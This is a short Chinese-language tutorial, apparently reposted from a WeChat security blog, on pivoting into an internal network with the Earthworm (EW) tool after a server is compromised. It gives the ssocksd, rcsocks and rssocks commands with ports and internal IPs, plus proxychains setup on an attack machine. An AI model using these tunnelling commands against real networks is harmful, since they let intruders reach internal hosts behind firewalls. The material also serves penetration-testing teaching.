Earthworm (EW) 做Socks5正向和反向代理穿透内网
一、Earthworm (EW)简介
EW是一套便捷的网络穿透工具
工具支持多个平台,穿透模式分为正向代理和反向代理
该工具已经停止更新了,并且杀软都会报毒
二、EW使用
网络拓扑图
正向代理
假设拿下B服务器,将工具上传到B服务器上使用
跳板机执行命令
ew_for_Win.exe -s ssocksd -l 8888
攻击机开立开启代理
vim /etc/proxychains.conf
//这里填写的IP是跳板机的IP地址和跳板机上设置的端口
成功访问内网机器的80端口
proxychains curl http://10.10.10.132:80
反向代理
先在B机器上执行命令
ew_for_Win.exe -s rcsocks -l 7766 -e 6677
//跳板机监听7766端口并把流量走6677端口
再在C机器上执行命令
ew_for_Win.exe -s rssocks -d 10.10.10.133 -e 6677
//内网机器连接10.10.10.133的6677端口
攻击机开启代理
vim /etc/proxychains.conf
//本地机器做代理,流量走跳板机的7766端口,就可以访问到C内网
成功访问
代理后的拓扑图![Earthworm (EW) 做Socks5正向和反向代理穿透内网 Earthworm (EW) 做Socks5正向和反向代理穿透内网]()
原文始发于微信公众号(Nurburgring):Earthworm (EW) 做Socks5正向和反向代理穿透内网
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论